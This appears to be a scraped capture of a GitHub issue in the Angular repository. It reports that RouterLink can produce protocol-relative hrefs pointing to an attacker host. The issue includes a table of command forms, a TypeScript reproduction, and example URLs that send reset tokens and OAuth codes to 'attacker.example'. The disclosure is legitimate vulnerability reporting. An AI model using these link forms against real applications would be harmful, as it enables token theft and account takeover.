René's URL Explorer Experiment


Title: RouterLink can serialize internal route commands into protocol-relative external hrefs · Issue #69700 · angular/angular · GitHub

Open Graph Title: RouterLink can serialize internal route commands into protocol-relative external hrefs · Issue #69700 · angular/angular

X Title: RouterLink can serialize internal route commands into protocol-relative external hrefs · Issue #69700 · angular/angular

Description: Which @angular/* package(s) are the source of the bug? router Is this a regression? No Description RouterLink is documented as a directive that creates links for Angular route navigation. The input is treated as commands passed to Router...

Open Graph Description: Which @angular/* package(s) are the source of the bug? router Is this a regression? No Description RouterLink is documented as a directive that creates links for Angular route navigation. The input...

X Description: Which @angular/* package(s) are the source of the bug? router Is this a regression? No Description RouterLink is documented as a directive that creates links for Angular route navigation. The input...

Opengraph URL: https://github.com/angular/angular/issues/69700

X: @github

direct link

Domain: github.com


Hey, it has json ld scripts:
{"@context":"https://schema.org","@type":"DiscussionForumPosting","headline":"RouterLink can serialize internal route commands into protocol-relative external hrefs","articleBody":"### Which @angular/* package(s) are the source of the bug?\n\nrouter\n\n### Is this a regression?\n\nNo\n\n### Description\n\n`RouterLink` is documented as a directive that creates links for Angular route navigation. The input is treated as commands passed to `Router#createUrlTree`, or as a `UrlTree`.\n\n\nHowever , `RouterLink` can serialize some internal Angular route command forms into an `href` that starts with `//`.\n\nBrowsers treat `//attacker.example/path` as a scheme-relative external URL. On an HTTPS app, that becomes:\n\n```text\nhttps://attacker.example/path\n```\n\nSo an application can use `RouterLink` expecting internal Angular navigation, but Angular writes an attacker-controlled external URL into the DOM.\n\nThe issue appears when the internal route command creates an empty leading primary segment after the app root.\n\n## Attacker redirect cases\n\nValidated cases that generate an external attacker-controlled `href`:\n\n| Case | RouterLink command                             | Attacker-controlled input                       | Generated href                   |\n| ---- | ---------------------------------------------- | ----------------------------------------------- | -------------------------------- |\n| 1    | `['/', '', host, path]`                        | `host = 'attacker.example'`, `path = 'collect'` | `//attacker.example/collect?...` |\n| 2    | `['/', ...next.split('/')]`                    | `next = '/attacker.example/collect'`            | `//attacker.example/collect?...` |\n| 3    | `[{ outlets: { primary: next } }]`             | `next = '/attacker.example/collect'`            | `//attacker.example/collect?...` |\n| 4    | `[{ outlets: { primary: ['', host, path] } }]` | `host = 'attacker.example'`, `path = 'collect'` | `//attacker.example/collect?...` |\n\nOn an HTTPS application, all of these browser-resolve to:\n\n```text\nhttps://attacker.example/collect?...\n```\n\n\nThe impact becomes security-relevant when the app also uses:\n\n```html\nqueryParamsHandling=\"preserve\"\n```\n\nor:\n\n```html\nqueryParamsHandling=\"merge\"\n```\n\nIn those modes, Angular can copy the current URL query parameters into the generated external link.\n\nExample trusted URL:\n\n```text\nhttps://victim.example/reset?token=RESET_TOKEN\u0026code=OAUTH_CODE\u0026next=/attacker.example/collect\n```\n\nGenerated `RouterLink` href:\n\n```html\n\u003ca\n  href=\"//attacker.example/collect?token=RESET_TOKEN\u0026code=OAUTH_CODE\u0026next=...\"\n\u003e\u003c/a\u003e\n```\n\nBrowser destination:\n\n```text\nhttps://attacker.example/collect?token=RESET_TOKEN\u0026code=OAUTH_CODE\u0026next=...\n```\n\nThis can leak values such as password reset tokens, magic-login tokens, invite tokens, OAuth authorization codes, OAuth state values, or email verification tokens.\n\n## Minimal reproduction\n\n```ts\nimport { Component, inject } from \"@angular/core\";\nimport { ActivatedRoute, RouterLink } from \"@angular/router\";\n\n@Component({\n  selector: \"app-home\",\n  imports: [RouterLink],\n  template: `\n    \u003ca\n      id=\"case-1\"\n      target=\"_blank\"\n      [routerLink]=\"noSplitCommands\"\n      queryParamsHandling=\"preserve\"\n    \u003e\n      Case 1\n    \u003c/a\u003e\n\n    \u003ca\n      id=\"case-2\"\n      target=\"_blank\"\n      [routerLink]=\"splitCommands\"\n      queryParamsHandling=\"preserve\"\n    \u003e\n      Case 2\n    \u003c/a\u003e\n\n    \u003ca\n      id=\"case-3\"\n      target=\"_blank\"\n      [routerLink]=\"primaryOutletCommands\"\n      queryParamsHandling=\"preserve\"\n    \u003e\n      Case 3\n    \u003c/a\u003e\n\n    \u003ca\n      id=\"case-4\"\n      target=\"_blank\"\n      [routerLink]=\"primaryOutletArrayCommands\"\n      queryParamsHandling=\"preserve\"\n    \u003e\n      Case 4\n    \u003c/a\u003e\n  `,\n})\nexport class Home {\n  private readonly route = inject(ActivatedRoute);\n\n  readonly host =\n    this.route.snapshot.queryParamMap.get(\"host\") ?? \"attacker.example\";\n\n  readonly path = this.route.snapshot.queryParamMap.get(\"path\") ?? \"collect\";\n\n  readonly next =\n    this.route.snapshot.queryParamMap.get(\"next\") ??\n    `/${this.host}/${this.path}`;\n\n  readonly noSplitCommands = [\"/\", \"\", this.host, this.path];\n\n  readonly splitCommands = [\"/\", ...this.next.split(\"/\")];\n\n  readonly primaryOutletCommands = [{ outlets: { primary: this.next } }];\n\n  readonly primaryOutletArrayCommands = [\n    { outlets: { primary: [\"\", this.host, this.path] } },\n  ];\n}\n```\n\n## Additional\n\nA normal left-click without `target` may be intercepted by Angular. However, the external `href` already exists in the DOM and can still be followed by native anchor navigation paths such as:\n\n```text\ntarget=\"_blank\", \"_top\", \"_parent\", or named target\nmiddle-click\nCtrl/Cmd-click\ncontext menu -\u003e open link in new tab/window\nSSR / pre-hydration link following\nno-JavaScript clients\ncrawlers, preview bots, or link scanners\nchild click handlers that call stopPropagation() without preventDefault()\n```\n\n### Please provide a link to a minimal reproduction of the bug\n\nThis was previously reported at https://issuetracker.google.com/u/1/issues/531036578, however it is not considered a problem, I believe it should be reconsidered\n ","author":{"url":"https://github.com/SkyZeroZx","@type":"Person","name":"SkyZeroZx"},"datePublished":"2026-07-09T04:12:27.000Z","interactionStatistic":{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":3},"url":"https://github.com/69700/angular/issues/69700"}

route-pattern/_view_fragments/issues/show/:user_id/:repository/:id/issue_layout(.:format)
route-controllervoltron_issues_fragments
route-actionissue_layout
fetch-noncev2:6db9f198-8f53-e535-f227-bb0888a77b5e
current-catalog-service-hash81bb79d38c15960b92d99bca9288a9108c7a47b18f2423d0f6438c5b7bcd2114
request-idDBD0:2D9F61:223EB5:2E20C2:6A628FD0
html-safe-nonce83718a55b465fd135df11ce5ef677b30d52db882405ab30f41e053872e062b35
visitor-payloadeyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJEQkQwOjJEOUY2MToyMjNFQjU6MkUyMEMyOjZBNjI4RkQwIiwidmlzaXRvcl9pZCI6IjcyMTY2MzM1ODg0NjEyNDQzNjgiLCJyZWdpb25fZWRnZSI6ImlhZCIsInJlZ2lvbl9yZW5kZXIiOiJpYWQifQ==
visitor-hmac5e28dd718fb586bbbf2649353d710b6b30dbea04d128df2ad78d3519c8914881
hovercard-subject-tagissue:4843092397
github-keyboard-shortcutsrepository,issues,copilot
google-site-verificationApib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I
octolytics-urlhttps://collector.github.com/github/collect
analytics-location///voltron/issues_fragments/issue_layout
fb:app_id1401488693436528
apple-itunes-appapp-id=1477376905, app-argument=https://github.com/_view_fragments/issues/show/angular/angular/69700/issue_layout
twitter:imagehttps://opengraph.githubassets.com/22f702178902781108e16242dfdf5ac0f5eb3c2c5825ebb37ef385f514cff85f/angular/angular/issues/69700
twitter:cardsummary_large_image
og:imagehttps://opengraph.githubassets.com/22f702178902781108e16242dfdf5ac0f5eb3c2c5825ebb37ef385f514cff85f/angular/angular/issues/69700
og:image:altWhich @angular/* package(s) are the source of the bug? router Is this a regression? No Description RouterLink is documented as a directive that creates links for Angular route navigation. The input...
og:image:width1200
og:image:height600
og:site_nameGitHub
og:typeobject
og:author:usernameSkyZeroZx
hostnamegithub.com
expected-hostnamegithub.com
Noneac2209d8cb6970a1bd08cb0a3f821d7166ac544c2ca1c87819c335bb84310ecd
turbo-cache-controlno-preview
go-importgithub.com/angular/angular git https://github.com/angular/angular.git
octolytics-dimension-user_id139426
octolytics-dimension-user_loginangular
octolytics-dimension-repository_id24195339
octolytics-dimension-repository_nwoangular/angular
octolytics-dimension-repository_publictrue
octolytics-dimension-repository_is_forkfalse
octolytics-dimension-repository_network_root_id24195339
octolytics-dimension-repository_network_root_nwoangular/angular
turbo-body-classeslogged-out env-production page-responsive
disable-turbofalse
browser-stats-urlhttps://api.github.com/_private/browser/stats
browser-errors-urlhttps://api.github.com/_private/browser/errors
release2fca8cd598678aaa64706088ad13b4e19177e108
ui-targetfull
theme-color#1e2327
color-schemelight dark

Links:

Skip to contenthttps://github.com/angular/angular/issues/69700#start-of-content
https://github.com/
Sign in https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fangular%2Fangular%2Fissues%2F69700
GitHub CopilotWrite better code with AIhttps://github.com/features/copilot
GitHub Copilot appDirect agents from issue to mergehttps://github.com/features/ai/github-app
MCP RegistryNewIntegrate external toolshttps://github.com/mcp
ActionsAutomate any workflowhttps://github.com/features/actions
CodespacesInstant dev environmentshttps://github.com/features/codespaces
IssuesPlan and track workhttps://github.com/features/issues
Code ReviewManage code changeshttps://github.com/features/code-review
Code QualityEnforce quality at mergehttps://github.com/features/code-quality
GitHub Advanced SecurityFind and fix vulnerabilitieshttps://github.com/security/advanced-security
Code securitySecure your code as you buildhttps://github.com/security/advanced-security/code-security
Secret protectionStop leaks before they starthttps://github.com/security/advanced-security/secret-protection
Why GitHubhttps://github.com/why-github
Documentationhttps://docs.github.com
Bloghttps://github.blog
Changeloghttps://github.blog/changelog
Marketplacehttps://github.com/marketplace
View all featureshttps://github.com/features
Enterpriseshttps://github.com/enterprise
Small and medium teamshttps://github.com/team
Startupshttps://github.com/enterprise/startups
Nonprofitshttps://github.com/solutions/industry/nonprofits
App Modernizationhttps://github.com/solutions/use-case/app-modernization
DevSecOpshttps://github.com/solutions/use-case/devsecops
DevOpshttps://github.com/solutions/use-case/devops
CI/CDhttps://github.com/solutions/use-case/ci-cd
View all use caseshttps://github.com/solutions/use-case
Healthcarehttps://github.com/solutions/industry/healthcare
Financial serviceshttps://github.com/solutions/industry/financial-services
Manufacturinghttps://github.com/solutions/industry/manufacturing
Governmenthttps://github.com/solutions/industry/government
View all industrieshttps://github.com/solutions/industry
View all solutionshttps://github.com/solutions
AIhttps://github.com/resources/articles?topic=ai
Software Developmenthttps://github.com/resources/articles?topic=software-development
DevOpshttps://github.com/resources/articles?topic=devops
Securityhttps://github.com/resources/articles?topic=security
View all topicshttps://github.com/resources/articles
Customer storieshttps://github.com/customer-stories
Events & webinarshttps://github.com/resources/events
Ebooks & reportshttps://github.com/resources/whitepapers
Business insightshttps://github.com/solutions/executive-insights
GitHub Skillshttps://skills.github.com
Documentationhttps://docs.github.com
Customer supporthttps://support.github.com
Community forumhttps://github.com/orgs/community/discussions
Trust centerhttps://github.com/trust-center
Partnershttps://github.com/partners
View all resourceshttps://github.com/resources
GitHub SponsorsFund open source developershttps://github.com/open-source/sponsors
Security Labhttps://securitylab.github.com
Maintainer Communityhttps://maintainers.github.com
Acceleratorhttps://github.com/open-source/accelerator
GitHub Starshttps://stars.github.com
Archive Programhttps://archiveprogram.github.com
Topicshttps://github.com/topics
Trendinghttps://github.com/trending
Collectionshttps://github.com/collections
Enterprise platformAI-powered developer platformhttps://github.com/enterprise
GitHub Advanced SecurityEnterprise-grade security featureshttps://github.com/security/advanced-security
Copilot for BusinessEnterprise-grade AI featureshttps://github.com/features/copilot/copilot-business
Premium SupportEnterprise-grade 24/7 supporthttps://github.com/enterprise/premium-support
Pricinghttps://github.com/pricing
Search syntax tipshttps://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
documentationhttps://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
Sign in https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fangular%2Fangular%2Fissues%2F69700
Sign up https://github.com/signup?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Fvoltron%2Fissues_fragments%2Fissue_layout&source=header-repo&source_repo=angular%2Fangular
Reloadhttps://github.com/angular/angular/issues/69700
Reloadhttps://github.com/angular/angular/issues/69700
Reloadhttps://github.com/angular/angular/issues/69700
Please reload this pagehttps://github.com/angular/angular/issues/69700
angular https://github.com/angular
angularhttps://github.com/angular/angular
Notifications https://github.com/login?return_to=%2Fangular%2Fangular
Fork 27.3k https://github.com/login?return_to=%2Fangular%2Fangular
Star 101k https://github.com/login?return_to=%2Fangular%2Fangular
Code https://github.com/angular/angular
Issues 983 https://github.com/angular/angular/issues
Pull requests 172 https://github.com/angular/angular/pulls
Discussions https://github.com/angular/angular/discussions
Actions https://github.com/angular/angular/actions
Projects https://github.com/angular/angular/projects
Security and quality 24 https://github.com/angular/angular/security
Insights https://github.com/angular/angular/pulse
Code https://github.com/angular/angular
Issues https://github.com/angular/angular/issues
Pull requests https://github.com/angular/angular/pulls
Discussions https://github.com/angular/angular/discussions
Actions https://github.com/angular/angular/actions
Projects https://github.com/angular/angular/projects
Security and quality https://github.com/angular/angular/security
Insights https://github.com/angular/angular/pulse
#69874https://github.com/angular/angular/pull/69874
RouterLink can serialize internal route commands into protocol-relative external hrefshttps://github.com/angular/angular/issues/69700#top
#69874https://github.com/angular/angular/pull/69874
area: routerhttps://github.com/angular/angular/issues?q=state%3Aopen%20label%3A%22area%3A%20router%22
needsTriagehttps://github.com/angular/angular/milestone/83
https://github.com/SkyZeroZx
SkyZeroZxhttps://github.com/SkyZeroZx
on Jul 9, 2026https://github.com/angular/angular/issues/69700#issue-4843092397
https://issuetracker.google.com/u/1/issues/531036578https://issuetracker.google.com/u/1/issues/531036578
area: routerhttps://github.com/angular/angular/issues?q=state%3Aopen%20label%3A%22area%3A%20router%22
needsTriageNo due datehttps://github.com/angular/angular/milestone/83
https://github.com
Termshttps://docs.github.com/site-policy/github-terms/github-terms-of-service
Privacyhttps://docs.github.com/site-policy/privacy-policies/github-privacy-statement
Securityhttps://github.com/security
Statushttps://www.githubstatus.com/
Communityhttps://github.community/
Docshttps://docs.github.com/
Contacthttps://support.github.com?tags=dotcom-footer

Viewport: width=device-width


URLs of crawlers that visited me.